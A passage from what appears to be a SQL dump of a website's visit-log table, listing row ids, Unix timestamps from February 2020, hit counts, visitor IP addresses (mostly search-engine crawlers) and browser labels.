,1,1,0,0,'141.8.142.50','other'),(483917,1582430405,1,1,0,0,'141.8.132.37','other'),(483918,1582430532,1,1,0,0,'141.8.142.164','other'),(483919,1582431171,1,1,0,0,'66.249.65.98','chrome'),(483920,1582431271,1,0,1,0,'157.55.39.247',''),(483921,1582431378,1,1,0,0,'207.46.13.31','other'),(483922,1582431403,1,1,0,0,'141.8.183.100','other'),(483923,1582431406,1,1,0,0,'87.250.224.90','other'),(483924,1582431548,2,2,0,0,'207.46.13.37','other'),(483925,1582431693,3,3,0,0,'178.154.171.134','other'),(483926,1582431933,1,1,0,0,'178.154.171.127','other'),(483927,1582432653,1,1,0,0,'141.8.142.2','other'),(483928,1582432833,1,1,0,0,'66.249.65.126','chrome'),(483929,1582433018,1,1,0,0,'8.29.198.26','other'),(483930,1582433209,1,1,0,0,'141.8.132.12','other'),(483931,1582433277,1,1,0,0,'141.8.132.2','other'),(483932,1582433377,1,1,0,0,'141.8.142.119','other'),(483933,1582433549,1,1,0,0,'141.8.142.161','other'),(483934,1582433774,1,1,0,0,'95.216.20.96','chrome'),(483935,1582434149,3,3,0,0,'178.154.171.134','other'),(483936,1582434622,1,0,1,0,'157.55.39.247',''),(483937,1582434701,1,0,1,0,'66.249.65.101',''),(483938,1582434874,1,1,0,0,'46.211.145.233','chrome'),(483939,1582435104,1,1,0,0,'141.8.188.25','other'),(483940,1582435247,1,1,0,0,'157.55.39.247','other'),(483941,1582435304,1,1,0,0,'8.29.198.27','other'),(483942,1582435886,1,1,0,0,'66.249.65.126','chrome'),(483943,1582436144,1,1,0,0,'207.46.13.37','other'),(483944,1582436374,1,1,0,0,'141.8.142.2','other'),(483945,1582436594,1,1,0,0,'62.205.134.182','other'),(483946,1582436886,3,3,0,0,'178.154.171.134','other'),(483947,1582437222,2,2,0,0,'66.249.65.101','chrome'),(483948,1582438344,1,1,0,0,'91.196.178.131','firefox'),(483949,1582438728,3,3,0,0,'178.154.171.134','other'),(483950,1582438885,1,1,0,0,'207.46.13.37','other'),(483951,1582439470,1,1,0,0,'178.154.171.127','other'),(483952,1582439532,1,0,1,0,'66.249.65.126',''),(483953,1582439737,4,4,0,0,'178.154.171.134','other'),(483954,1582439849,1,1,0,0,'66.249.65.101','chrome'),(483955,1582441208,3,3,0,0,'178.154.171.134','other'),(483956,1582441289,2,2,0,0,'66.249.65.101','chrome'),(483957,1582441774,1,1,0,0,'66.249.65.98','chrome'),(483958,1582441996,1,1,0,0,'87.250.224.90','other'),(483959,1582442260,1,1,0,0,'46.219.223.254','chrome'),(483960,1582442422,1,1,0,0,'157.55.39.247','other'),(483961,1582442567,1,1,0,0,'178.154.171.66','other'),(483962,1582442683,1,1,0,0,'66.249.65.98','chrome'),(483963,1582442734,1,1,0,0,'95.108.213.55','other'),(483964,1582443247,1,1,0,0,'66.249.73.164','chrome'),(483965,1582443620,2,2,0,0,'178.154.171.127','other'),(483966,1582443667,1,1,0,0,'178.154.171.134','other'),(483967,1582443973,1,1,0,0,'8.29.198.25','other'),(483968,1582444032,1,1,0,0,'141.8.183.100','other'),(483969,1582444857,1,1,0,0,'157.55.39.247','other'),(483970,1582444941,1,1,0,0,'207.46.13.31','other'),(483971,1582444947,21,21,0,0,'35.236.189.68','msie'),(483972,1582445031,1,1,0,0,'66.249.65.101','chrome'),(483973,1582445544,1,1,0,0,'178.154.171.134','other'),(483974,1582446127,3,3,0,0,'207.46.13.31','other'),(483975,1582446226,1,1,0,0,'207.46.13.37','other'),(483976,1582446230,1,1,0,0,'157.55.39.247','other'),(483977,1582446237,1,1,0,0,'8.29.198.27','other'),(483978,1582446472,1,1,0,0,'178.154.171.127','other'),(483979,1582447327,1,1,0,0,'141.8.183.100','other'),(483980,1582447957,1,1,0,0,'141.8.142.161','other'),(483981,1582447989,1,1,0,0,'157.55.39.247','other'),(483982,1582448080,1,1,0,0,'91.209.11.236','other'),(483983,1582448186,1,1,0,0,'141.8.142.2','other'),(483984,1582448249,1,1,0,0,'141.8.142.164','other'),(483985,1582448347,1,1,0,0,'141.8.188.12','other'),(483986,1582449005,1,1,0,0,'178.154.171.134','other'),(483987,1582449202,1,1,0,0,'178.154.171.127','other'),(483988,1582449944,1,1,0,0,'66.249.65.101','chrome'),(483989,1582449952,1,1,0,0,'66.249.65.98','chrome'),(483990,1582449960,1,1,0,0,'66.249.73.164','chrome'),(483991,1582450362,1,1,0,0,'95.108.213.55','other'),(483992,1582450834,1,1,0,0,'141.8.183.53','other'),(483993,1582450984,1,1,0,0,'66.249.65.98','chrome'),(483994,1582451168,2,2,0,0,'141.8.142.2','other'),(483995,1582451228,1,1,0,0,'141.8.142.177','other'),(483996,1582451933,1,1,0,0,'178.154.171.134','other'),(483997,1582452233,1,1,0,0,'66.249.73.190','chrome'),(483998,1582452347,1,1,0,0,'141.8.183.111','other'),(483999,1582452361,1,1,0,0,'193.106.30.99','firefox'),(484000,1582452839,1,1,0,0,'66.249.73.161','chrome'),(484001,1582452918,1,1,0,0,'141.8.142.161','other'),(484002,1582452990,1,1,0,0,'178.154.171.134','other'),(484003,1582454908,1,1,0,0,'8.29.198.25','other'),(484004,1582455226,1,1,0,0,'66.249.65.126','chrome'),(484005,1582455703,2,1,1,0,'207.46.13.31',''),(484006,1582456454,3,3,0,0,'91.209.11.236','other'),(484007,1582456456,1,0,1,0,'157.55.39.247',''),(484008,1582456571,1,1,0,0,'109.74.154.72','chrome'),(484009,1582456887,1,1,0,0,'207.46.13.31','other'),(484010,1582457155,1,1,0,0,'178.154.171.134','other'),(484011,1582457171,1,1,0,0,'8.29.198.27','other'),(484012,1582457752,1,0,1,0,'66.249.65.126',''),(484013,1582458243,1,1,0,0,'37.9.113.163','other'),(484014,1582459080,1,1,0,0,'91.196.178.168','chrome'),(484015,1582459550,1,1,0,0,'31.13.127.7','other'),(484016,1582459551,1,1,0,0,'31.13.127.18','other'),(484017,1582460634,1,1,0,0,'207.46.13.37','other'),(484018,1582460965,1,1,0,0,'207.46.13.31','other'),(484019,1582461598,1,0,1,0,'207.46.13.37',''),(484020,1582461925,2,2,0,0,'207.46.13.31','other'),(484021,1582464768,1,1,0,0,'66.249.65.98','chrome'),(484022,1582465363,1,1,0,0,'207.46.13.31','other'),(484023,1582465836,1,1,0,0,'8.29.198.27','other'),(484024,1582468114,1,1,0,0,'8.29.198.27','other'),(484025,1582468502,1,1,0,0,'51.68.152.26','chrome'),(484026,1582469413,1,1,0,0,'207.46.13.31','other'),(484027,1582470418,72,72,0,0,'165.22.232.22','chrome'),(484028,1582471934,1,1,0,0,'157.55.39.247','other'),(484029,1582472329,1,1,0,0,'207.46.13.31','other'),(484030,1582473119,1,1,0,0,'66.249.83.199','other'),(484031,1582473562,1,1,0,0,'46.211.156.148','chrome'),(484032,1582475058,1,1,0,0,'31.13.127.7','other'),(484033,1582475163,1,1,0,0,'157.55.39.247','other'),(484034,1582476033,1,1,0,0,'207.46.13.209','other'),(484035,1582476103,2,2,0,0,'207.46.13.31','other'),(484036,1582476763,1,1,0,0,'8.29.198.25','other'),(484037,1582477834,1,1,0,0,'157.55.39.247','other'),(484038,1582478433,1,1,0,0,'66.249.64.26','chrome'),(484039,1582479041,1,1,0,0,'8.29.198.25','other'),(484040,1582479868,2,2,0,0,'66.249.64.28','chrome'),(484041,1582480496,1,1,0,0,'91.209.11.236','other'),(484042,1582480696,1,1,0,0,'141.8.142.161','other'),(484043,1582480896,1,1,0,0,'66.249.64.28','chrome'),(484044,1582480919,3,3,0,0,'66.249.64.26','chrome'),(484045,1582481332,1,0,1,0,'66.249.64.27',''),(484046,1582481755,1,1,0,0,'46.211.128.66','chrome'),(484047,1582482167,2,2,0,0,'213.180.203.124','other'),(484048,1582482195,1,1,0,0,'213.180.203.185','other'),(484049,1582482330,2,1,1,0,'157.55.39.247',''),(484050,1582482423,1,0,1,0,'66.249.64.27',''),(484051,1582482450,1,1,0,0,'157.55.39.238','other'),(484052,1582482863,1,1,0,0,'66.249.70.33','chrome'),(484053,1582482885,1,1,0,0,'213.180.203.66','other'),(484054,1582483079,1,1,0,0,'213.180.203.1','other'),(484055,1582483179,4,4,0,0,'213.180.203.124','other'),(484056,1582483545,2,2,0,0,'213.180.203.185','other'),(484057,1582484214,1,1,0,0,'141.8.183.15','other'),(484058,1582484362,2,2,0,0,'66.249.64.26','chrome'),(484059,1582484578,1,1,0,0,'66.249.64.28','chrome'),(484060,1582484825,1,1,0,0,'213.180.203.185','other'),(484061,1582484835,1,1,0,0,'66.249.64.27','chrome'),(484062,1582484838,1,1,0,0,'213.180.203.121','other'),(484063,1582484885,1,1,0,0,'157.55.39.247','other'),(484064,1582485021,1,1,0,0,'213.180.203.124','other'),(484065,1582485806,1,1,0,0,'213.180.203.185','other'),(484066,1582485975,1,1,0,0,'66.249.64.27','chrome'),(484067,1582486259,2,2,0,0,'213.180.203.124','other'),(484068,1582486878,1,1,0,0,'95.217.131.74','firefox'),(484069,1582487038,2,2,0,0,'66.249.64.28','chrome'),(484070,1582487077,1,1,0,0,'66.249.64.27','chrome'),(484071,1582487092,1,1,0,0,'66.249.64.26','chrome'),(484072,1582487141,1,1,0,0,'91.196.178.88','chrome'),(484073,1582487507,1,1,0,0,'213.180.203.185','other'),(484074,1582487716,1,1,0,0,'8.29.198.26','other'),(484075,1582487720,1,1,0,0,'91.196.178.117','chrome'),(484076,1582487794,1,1,0,0,'157.55.39.247','other'),(484077,1582488103,2,2,0,0,'213.180.203.124','other'),(484078,1582488417,1,1,0,0,'66.249.70.36','chrome'),(484079,1582489202,4,4,0,0,'213.180.203.124','other'),(484080,1582489689,1,1,0,0,'66.249.64.28','chrome'),(484081,1582489695,2,2,0,0,'66.249.64.26','chrome'),(484082,1582489749,2,2,0,0,'207.46.13.209','other'),(484083,1582489956,1,1,0,0,'157.55.39.238','other'),(484084,1582489957,2,2,0,0,'213.180.203.185','other'),(484085,1582490010,1,1,0,0,'8.29.198.25','other'),(484086,1582490039,1,1,0,0,'66.249.64.27','chrome'),(484087,1582490829,1,1,0,0,'157.55.39.247','other'),(484088,1582491265,2,2,0,0,'213.180.203.124','other'),(484089,1582491694,1,1,0,0,'207.46.13.209','other'),(484090,1582492188,2,2,0,0,'213.180.203.124','other'),(484091,1582492688,2,2,0,0,'157.55.39.247','other'),(484092,1582492715,1,1,0,0,'66.249.64.28','chrome'),(484093,1582492748,1,1,0,0,'213.180.203.185','other'),(484094,1582493347,3,3,0,0,'66.249.64.26','chrome'),(484095,1582493469,2,2,0,0,'213.180.203.124','other'),(484096,1582493613,1,1,0,0,'213.180.203.16','other'),(484097,1582493901,1,0,1,0,'157.55.39.238',''),(484098,1582494315,1,1,0,0,'95.217.131.74','firefox'),(484099,1582494330,1,1,0,0,'66.249.64.26','chrome'),(484100,1582494358,2,2,0,0,'213.180.203.185','other'),(484101,1582494986,3,3,0,0,'213.180.203.124','other'),(484102,1582495362,1,1,0,0,'46.211.134.77','chrome'),(484103,1582495653,1,1,0,0,'213.180.203.185','other'),(484104,1582496021,1,1,0,0,'213.180.203.124','other'),(484105,1582496059,1,1,0,0,'66.249.64.26','chrome'),(484106,1582497230,2,2,0,0,'213.180.203.124','other'),(484107,1582497425,1,1,0,0,'66.249.64.28','chrome'),(484108,1582497535,1,1,0,0,'207.46.13.209','other'),(484109,1582497611,1,1,0,0,'66.249.64.26','chrome'),(484110,1582497820,1,1,0,0,'66.249.64.27','chrome'),(484111,1582498192,4,4,0,0,'213.180.203.124','other'),(484112,1582498657,1,1,0,0,'8.29.198.26','other'),(484113,1582499304,1,1,0,0,'66.249.64.28','chrome'),(484114,1582499307,3,3,0,0,'213.180.203.124','other'),(484115,1582500270,2,2,0,0,'213.180.203.185','other'),(484116,1582500463,1,1,0,0,'66.249.64.26','chrome'),(484117,1582500541,1,1,0,0,'157.55.39.247','other'),(484118,1582500623,2,2,0,0,'66.249.64.27','chrome'),(484119,1582500942,1,1,0,0,'8.29.198.27','other'),(484120,1582500993,1,1,0,0,'141.8.183.53','other'),(484121,1582501194,1,1,0,0,'213.180.203.185','other'),(484122,1582501370,1,1,0,0,'66.249.64.26','chrome'),(484123,1582501408,1,1,0,0,'66.249.70.33','chrome'),(484124,1582501484,3,3,0,0,'213.180.203.124','other'),(484125,1582502023,1,1,0,0,'213.180.203.170','other'),(484126,1582502297,1,0,1,0,'207.46.13.209',''),(484127,1582502491,1,1,0,0,'213.180.203.124','other'),(484128,1582502512,1,1,0,0,'66.249.70.33','chrome'),(484129,1582502766,1,1,0,0,'66.249.64.26','chrome'),(484130,1582503238,1,1,0,0,'213.180.203.185','other'),(484131,1582503344,1,1,0,0,'66.249.64.27','chrome'),(484132,1582503619,1,1,0,0,'213.180.203.124','other'),(484133,1582503687,1,1,0,0,'66.249.70.62','chrome'),(484134,1582505005,1,1,0,0,'66.249.70.36','chrome'),(484135,1582505081,1,1,0,0,'213.180.203.124','other'),(484136,1582505777,1,1,0,0,'62.205.134.182','other'),(484137,1582506861,1,1,0,0,'213.180.203.124','other'),(484138,1582507183,1,1,0,0,'213.180.203.185','other'),(484139,1582507346,1,1,0,0,'66.249.64.27','chrome'),(484140,1582508176,3,3,0,0,'213.180.203.124','other'),(484141,1582509303,1,1,0,0,'213.180.203.20','other'),(484142,1582509432,2,2,0,0,'213.180.203.185','other'),(484143,1582509591,1,1,0,0,'8.29.198.26','other'),(484144,1582510001,1,1,0,0,'66.249.64.27','chrome'),(484145,1582511107,1,1,0,0,'141.8.183.33','other'),(484146,1582511284,2,2,0,0,'213.180.203.124','other'),(484147,1582511333,3,3,0,0,'213.180.203.185','other'),(484148,1582511561,1,1,0,0,'213.180.203.106','other'),(484149,1582511739,1,1,0,0,'213.180.203.124','chrome'),(484150,1582511829,1,1,0,0,'178.154.171.127','other'),(484151,1582511874,1,1,0,0,'8.29.198.27','other'),(484152,1582512474,2,2,0,0,'213.180.203.124','other'),(484153,1582512663,1,1,0,0,'213.180.203.106','other'),(484154,1582513118,1,1,0,0,'66.249.64.26','chrome'),(484155,1582513290,2,2,0,0,'213.180.203.16','other'),(484156,1582514638,3,3,0,0,'213.180.203.124','other'),(484157,1582514781,3,3,0,0,'213.180.203.185','other'),(484158,1582515873,1,1,0,0,'66.249.64.27','chrome'),(484159,1582515969,1,1,0,0,'207.46.13.209','other'),(484160,1582516289,1,1,0,0,'213.180.203.73','other'),(484161,1582516342,1,1,0,0,'213.180.203.1','other'),(484162,1582516811,1,1,0,0,'213.180.203.109','other'),(484163,1582516872,3,3,0,0,'213.180.203.124','other'),(484164,1582517356,1,1,0,0,'66.249.64.28','chrome'),(484165,1582519045,1,1,0,0,'66.249.64.26','chrome'),(484166,1582519068,5,5,0,0,'213.180.203.124','other'),(484167,1582519096,1,1,0,0,'145.255.9.48','firefox'),(484168,1582519475,1,1,0,0,'157.55.39.247','other'),(484169,1582519493,2,2,0,0,'157.55.39.118','other'),(484170,1582519920,1,1,0,0,'213.180.203.185','other'),(484171,1582520101,5,5,0,0,'213.180.203.124','other'),(484172,1582520517,1,1,0,0,'8.29.198.25','other'),(484173,1582520934,4,4,0,0,'213.180.203.185','other'),(484174,1582521172,1,1,0,0,'213.180.203.73','other'),(484175,1582521405,3,3,0,0,'213.180.203.124','other'),(484176,1582521964,1,1,0,0,'213.180.203.106','other'),(484177,1582522328,1,1,0,0,'66.249.64.27','chrome'),(484178,1582522480,2,2,0,0,'213.180.203.124','other'),(484179,1582522803,1,1,0,0,'8.29.198.25','other'),(484180,1582522992,1,1,0,0,'62.205.134.182','other'),(484181,1582523043,1,1,0,0,'66.249.64.26','chrome'),(484182,1582523689,1,1,0,0,'66.249.64.27','chrome'),(484183,1582523747,2,2,0,0,'213.180.203.124','other'),(484184,1582524636,2,2,0,0,'213.180.203.185','other'),(484185,1582524878,3,3,0,0,'213.180.203.124','other'),(484186,1582525188,1,1,0,0,'66.249.64.28','chrome'),(484187,1582526103,3,3,0,0,'213.180.203.124','other'),(484188,1582526558,1,1,0,0,'91.196.178.74','chrome'),(484189,1582526618,1,1,0,0,'66.249.64.28','chrome'),(484190,1582526973,1,1,0,0,'66.249.64.27','chrome'),(484191,1582527224,5,5,0,0,'213.180.203.124','other'),(484192,1582527935,1,1,0,0,'141.8.183.73','other'),(484193,1582528136,3,3,0,0,'213.180.203.185','other'),(484194,1582528283,1,1,0,0,'66.249.70.36','chrome'),(484195,1582528354,4,4,0,0,'213.180.203.124','other'),(484196,1582528550,1,1,0,0,'91.196.178.179','chrome'),(484197,1582528902,1,0,1,0,'66.249.64.26',''),(484198,1582528909,1,1,0,0,'66.249.64.26','chrome'),(484199,1582529210,3,3,0,0,'213.180.203.185','other'),(484200,1582529300,3,3,0,0,'213.180.203.124','other'),(484201,1582529473,1,1,0,0,'213.180.203.73','other'),(484202,1582530023,1,1,0,0,'157.55.39.247','other'),(484203,1582530145,1,1,0,0,'66.249.64.28','chrome'),(484204,1582530260,1,1,0,0,'91.196.178.76','chrome'),(484205,1582530491,1,1,0,0,'66.249.64.27','chrome'),(484206,1582530503,1,1,0,0,'130.180.211.53','chrome'),(484207,1582530521,1,1,0,0,'213.180.203.73','other'),(484208,1582530523,1,1,0,0,'213.180.203.106','other'),(484209,1582530569,2,2,0,0,'213.180.203.124','other'),(484210,1582531238,1,1,0,0,'91.196.178.76','chrome'),(484211,1582531423,1,1,0,0,'31.13.127.19','other'),(484212,1582531424,1,1,0,0,'31.13.127.10','other'),(484213,1582531439,1,1,0,0,'8.29.198.25','other'),(484214,1582531701,3,3,0,0,'213.180.203.124','other'),(484215,1582531838,1,1,0,0,'91.196.178.35','chrome'),(484216,1582531941,2,1,1,0,'66.249.64.28',''),(484217,1582532249,1,1,0,0,'66.249.64.27','chrome'),(484218,1582532639,1,1,0,0,'91.196.178.85','chrome'),(484219,1582532700,1,1,0,0,'193.107.72.72','chrome'),(484220,1582532720,1,1,0,0,'91.196.178.85','firefox'),(484221,1582533153,1,1,0,0,'157.55.39.247','other'),(484222,1582533158,1,1,0,0,'157.55.39.118','other'),(484223,1582533280,1,1,0,0,'66.249.64.27','chrome'),(484224,1582533341,3,3,0,0,'213.180.203.124','other'),(484225,1582533671,1,1,0,0,'130.180.211.53','chrome'),(484226,1582533837,1,1,0,0,'8.29.198.26','other'),(484227,1582534101,1,1,0,0,'91.196.178.76','chrome'),(484228,1582534493,2,2,0,0,'213.180.203.124','other'),(484229,1582534847,1,1,0,0,'213.180.203.185','other'),(484230,1582534849,1,1,0,0,'91.196.178.85','firefox'),(484231,1582535093,1,1,0,0,'66.249.64.28','chrome'),(484232,1582535758,1,1,0,0,'66.249.70.33','chrome'),(484233,1582536113,5,5,0,0,'213.180.203.124','other'),(484234,1582536379,1,1,0,0,'91.196.178.76','firefox'),(484235,1582536543,1,1,0,0,'141.8.142.2','other'),(484236,1582537042,1,1,0,0,'213.180.203.124','other'),(484237,1582537066,1,1,0,0,'34.229.131.5','chrome'),(484238,1582538003,4,4,0,0,'213.180.203.124','other'),(484239,1582538308,1,1,0,0,'91.196.179.25','firefox'),(484240,1582538803,1,1,0,0,'157.55.39.118','other'),(484241,1582538959,1,1,0,0,'213.180.203.185','other'),(484242,1582539050,1,1,0,0,'91.196.179.25','chrome'),(484243,1582539169,1,1,0,0,'207.46.13.226','other'),(484244,1582539258,1,1,0,0,'66.249.64.28','chrome'),(484245,1582539399,1,1,0,0,'66.249.64.27','chrome'),(484246,1582540903,3,3,0,0,'213.180.203.124','other'),(484247,1582540961,1,1,0,0,'157.55.39.247','other'),(484248,1582540966,2,2,0,0,'66.249.64.28','chrome'),(484249,1582540970,1,1,0,0,'66.249.64.27','chrome'),(484250,1582540986,1,1,0,0,'66.249.64.26','chrome'),(484251,1582541119,1,1,0,0,'66.249.70.62','chrome'),(484252,1582541266,1,1,0,0,'91.196.178.177','chrome'),(484253,1582541393,1,1,0,0,'213.180.203.185','other'),(484254,1582541931,1,1,0,0,'157.55.39.247','other'),(484255,1582542434,1,1,0,0,'8.29.198.26','other'),(484256,1582542771,1,1,0,0,'213.180.203.124','other'),(484257,1582542933,1,1,0,0,'109.74.154.72','chrome'),(484258,1582543254,1,1,0,0,'213.180.203.185','other'),(484259,1582543768,2,2,0,0,'213.180.203.124','other'),(484260,1582544336,2,2,0,0,'213.180.203.185','other'),(484261,1582544648,1,1,0,0,'141.8.142.50','other'),(484262,1582544785,1,1,0,0,'8.29.198.25','other'),(484263,1582545374,2,2,0,0,'213.180.203.124','other'),(484264,1582545609,1,1,0,0,'87.250.224.90','other'),(484265,1582545879,1,1,0,0,'157.55.39.118','other'),(484266,1582546378,1,1,0,0,'66.249.64.26','chrome'),(484267,1582546446,1,1,0,0,'91.196.178.186','chrome'),(484268,1582546642,1,1,0,0,'66.249.64.27','chrome'),(484269,1582546721,1,1,0,0,'207.46.13.209','other'),(484270,1582546802,5,5,0,0,'213.180.203.124','other'),(484271,1582546838,3,3,0,0,'213.180.203.185','other'),(484272,1582546875,1,1,0,0,'80.82.68.72','chrome'),(484273,1582548317,1,1,0,0,'213.180.203.82','other'),(484274,1582548827,1,1,0,0,'213.180.203.124','other'),(484275,1582548836,1,1,0,0,'91.196.178.144','chrome'),(484276,1582548838,1,1,0,0,'213.180.203.109','other'),(484277,1582549042,2,2,0,0,'178.154.171.134','other'),(484278,1582549175,1,1,0,0,'194.68.44.163','chrome'),(484279,1582549331,1,1,0,0,'212.109.49.250','chrome'),(484280,1582549798,1,1,0,0,'91.196.178.144','chrome'),(484281,1582549924,1,1,0,0,'178.92.170.175','chrome'),(484282,1582550200,1,1,0,0,'213.180.203.165','other'),(484283,1582550459,1,1,0,0,'157.55.39.118','other'),(484284,1582551802,1,1,0,0,'91.196.178.76','chrome'),(484285,1582552017,1,1,0,0,'178.154.171.127','other'),(484286,1582552132,3,3,0,0,'157.55.39.118','other'),(484287,1582552455,1,1,0,0,'91.196.177.46','chrome'),(484288,1582552862,1,1,0,0,'207.46.13.209','other'),(484289,1582553044,1,1,0,0,'178.154.171.127','other'),(484290,1582553450,1,1,0,0,'8.29.198.27','other'),(484291,1582554509,1,1,0,0,'141.8.142.50','other'),(484292,1582554546,1,1,0,0,'178.17.167.172','opera'),(484293,1582554814,1,1,0,0,'178.154.171.134','other'),(484294,1582554838,1,1,0,0,'178.154.171.127','other'),(484295,1582554914,1,1,0,0,'207.46.13.209','other'),(484296,1582555007,1,1,0,0,'91.196.178.168','chrome'),(484297,1582555423,1,0,1,0,'157.55.39.247',''),(484298,1582555779,1,1,0,0,'91.196.178.129','firefox'),(484299,1582555835,1,1,0,0,'8.29.198.26','other'),(484300,1582556296,1,1,0,0,'91.196.177.46','chrome'),(484301,1582556586,1,1,0,0,'207.46.13.209','other'),(484302,1582556860,1,1,0,0,'178.17.167.172','msie'),(484303,1582557115,1,1,0,0,'178.154.171.134','other'),(484304,1582557374,1,1,0,0,'91.196.178.85','chrome'),(484305,1582557487,1,1,0,0,'91.196.178.168','chrome'),(484306,1582557786,1,1,0,0,'37.9.113.177','other'),(484307,1582558002,2,2,0,0,'5.45.207.49','other'),(484308,1582558143,1,1,0,0,'213.180.203.124','other'),(484309,1582558170,2,2,0,0,'91.196.177.46','chrome'),(484310,1582559154,1,1,0,0,'141.8.132.37','other'),(484311,1582559769,1,1,0,0,'141.8.142.50','other'),(484312,1582559896,2,2,0,0,'213.180.203.124','other'),(484313,1582560908,1,1,0,0,'178.154.171.66','other'),(484314,1582560982,1,1,0,0,'141.8.132.2','other'),(484315,1582561121,1,1,0,0,'157.55.39.247','other'),(484316,1582561997,1,1,0,0,'5.45.207.49','other'),(484317,1582562096,1,1,0,0,'157.55.39.247','other'),(484318,1582562565,1,1,0,0,'141.8.142.161','other'),(484319,1582562797,1,1,0,0,'141.8.132.2','other'),(484320,1582563338,1,1,0,0,'141.8.183.73','other'),(484321,1582563367,1,1,0,0,'66.249.70.36','chrome'),(484322,1582563983,4,4,0,0,'178.154.171.134','other'),(484323,1582564397,1,1,0,0,'66.249.64.28','chrome'),(484324,1582564429,1,1,0,0,'8.29.198.27','other'),(484325,1582564891,1,1,0,0,'178.154.171.134','other'),(484326,1582565090,1,1,0,0,'31.13.127.15','other'),(484327,1582565091,2,2,0,0,'31.13.127.11','other'),(484331,1582565171,3,3,0,0,'31.13.127.30','other'),(484332,1582565172,2,2,0,0,'31.13.127.25','other'),(484336,1582565237,1,1,0,0,'31.13.127.7','other'),(484337,1582565238,1,1,0,0,'31.13.127.2','other'),(484339,1582565594,1,1,0,0,'31.13.127.12','other'),(484340,1582565869,2,2,0,0,'66.249.64.26','chrome'),(484341,1582565917,2,2,0,0,'178.154.171.134','other'),(484342,1582566122,2,1,1,0,'66.249.64.27',''),(484343,1582566862,1,1,0,0,'8.29.198.27','other'),(484344,1582567059,1,1,0,0,'91.196.178.67','firefox'),(484345,1582567085,1,1,0,0,'178.154.171.134','other'),(484346,1582567491,2,2,0,0,'66.249.64.28','chrome'),(484347,1582568188,1,1,0,0,'66.249.70.33','chrome'),(484348,1582568557,3,3,0,0,'178.154.171.134','other'),(484349,1582568653,2,2,0,0,'66.249.64.27','chrome'),(484350,1582569274,1,0,1,0,'157.55.39.247',''),(484351,1582570363,2,2,0,0,'5.45.207.65','other'),(484352,1582570664,1,1,0,0,'91.196.177.69','chrome'),(484353,1582571099,1,1,0,0,'66.249.64.27','chrome'),(484354,1582571692,1,1,0,0,'46.4.107.106','other'),(484355,1582571866,1,1,0,0,'91.196.178.183','chrome'),(484356,1582572196,1,1,0,0,'141.8.142.164','other'),(484357,1582573176,1,1,0,0,'66.249.64.28','chrome'),(484358,1582573242,1,1,0,0,'141.8.132.12','other'),(484359,1582573632,1,1,0,0,'66.249.64.27','chrome'),(484360,1582573637,1,1,0,0,'66.249.64.26','chrome'),(484361,1582575091,1,1,0,0,'37.9.113.33','other'),(484362,1582575173,1,1,0,0,'173.252.111.1','other'),(484363,1582575174,3,3,0,0,'173.252.111.11','other'),(484364,1582575175,1,1,0,0,'173.252.111.20','other'),(484365,1582575375,1,1,0,0,'8.29.198.27','other'),(484366,1582575523,1,1,0,0,'66.249.64.26','chrome'),(484367,1582575926,3,3,0,0,'157.55.39.247','other'),(484368,1582576085,2,2,0,0,'95.213.141.126','opera'),(484369,1582576444,1,1,0,0,'66.249.70.36','chrome'),(484370,1582576666,1,1,0,0,'91.209.11.236','other'),(484371,1582576746,2,2,0,0,'207.46.13.209','other'),(484372,1582578017,1,1,0,0,'8.29.198.26','other'),(484373,1582578185,1,1,0,0,'66.249.64.27','chrome'),(484374,1582578339,2,1,1,0,'66.249.64.26',''),(484375,1582581333,1,0,1,0,'207.46.13.209',''),(484376,1582581561,3,3,0,0,'157.55.39.118','other'),(484377,1582581908,1,1,0,0,'66.249.70.62','chrome'),(484378,1582582205,1,1,0,0,'66.249.64.27','chrome'),(484379,1582583283,1,1,0,0,'66.249.70.36','chrome'),(484380,1582583779,1,1,0,0,'66.249.64.26','chrome'),(484381,1582584431,1,0,1,0,'207.46.13.22',''),(484382,1582585235,1,1,0,0,'66.249.64.28','chrome'),(484383,1582585737,1,1,0,0,'66.249.64.27','chrome'),(484384,1582586469,1,1,0,0,'8.29.198.27','other'),(484385,1582586596,1,1,0,0,'207.46.13.211','other'),(484386,1582587062,1,1,0,0,'88.154.153.75','chrome'),(484387,1582587954,1,1,0,0,'207.46.13.209','other'),(484388,1582588303,1,1,0,0,'66.249.64.27','chrome'),(484389,1582588365,1,1,0,0,'141.8.183.15','chrome'),(484390,1582588506,1,1,0,0,'207.46.13.22','other'),(484391,1582589016,1,1,0,0,'8.29.198.26','other'),(484392,1582589074,1,1,0,0,'66.249.64.26','chrome'),(484393,1582589782,1,1,0,0,'66.249.64.27','chrome'),(484394,1582589960,1,1,0,0,'66.249.70.62','chrome'),(484395,1582590478,1,0,1,0,'207.46.13.211',''),(484396,1582590480,1,1,0,0,'207.46.13.211','other'),(484397,1582590517,2,2,0,0,'66.249.64.26','chrome'),(484398,1582590758,1,1,0,0,'207.46.13.22','other'),(484399,1582591056,1,1,0,0,'66.249.64.28','chrome'),(484400,1582591205,2,2,0,0,'66.249.64.27','chrome'),(484401,1582591775,1,1,0,0,'66.249.64.26','chrome'),(484402,1582592114,1,1,0,0,'62.205.134.182','other'),(484403,1582592807,1,1,0,0,'66.249.64.27','chrome'),(484404,1582593104,1,1,0,0,'66.249.64.28','chrome'),(484405,1582593217,1,1,0,0,'207.46.13.209','other'),(484406,1582594145,1,1,0,0,'66.249.64.28','chrome'),(484407,1582595015,1,1,0,0,'34.223.255.64','other'),(484408,1582595391,1,1,0,0,'207.46.13.211','other'),(484409,1582596023,1,1,0,0,'54.36.149.7','other'),(484410,1582596798,1,1,0,0,'54.36.149.48','other'),(484411,1582597436,1,1,0,0,'207.46.13.22','other'),(484412,1582597439,1,1,0,0,'8.29.198.27','other'),(484413,1582597649,1,1,0,0,'66.249.64.28','chrome'),(484414,1582598179,1,1,0,0,'199.244.88.131','chrome'),(484415,1582598235,1,1,0,0,'66.249.70.62','chrome'),(484416,1582599415,1,1,0,0,'66.249.70.36','chrome'),(484417,1582599566,1,1,0,0,'141.8.142.119','other'),(484418,1582599598,2,2,0,0,'157.55.39.53','other'),(484419,1582599657,1,1,0,0,'66.249.70.62','chrome'),(484420,1582599705,1,1,0,0,'54.36.149.22','other'),(484421,1582600058,1,1,0,0,'8.29.198.26','other'),(484422,1582600317,1,1,0,0,'66.249.64.26','chrome'),(484423,1582600460,1,1,0,0,'141.8.142.177','other'),(484424,1582600760,1,1,0,0,'141.8.183.100','other'),(484425,1582600906,1,1,0,0,'207.46.13.22','other'),(484426,1582601552,1,1,0,0,'95.108.213.55','other'),(484427,1582601631,2,2,0,0,'157.55.39.240','other'),(484428,1582601639,2,0,2,0,'157.55.39.53',''),(484429,1582601686,1,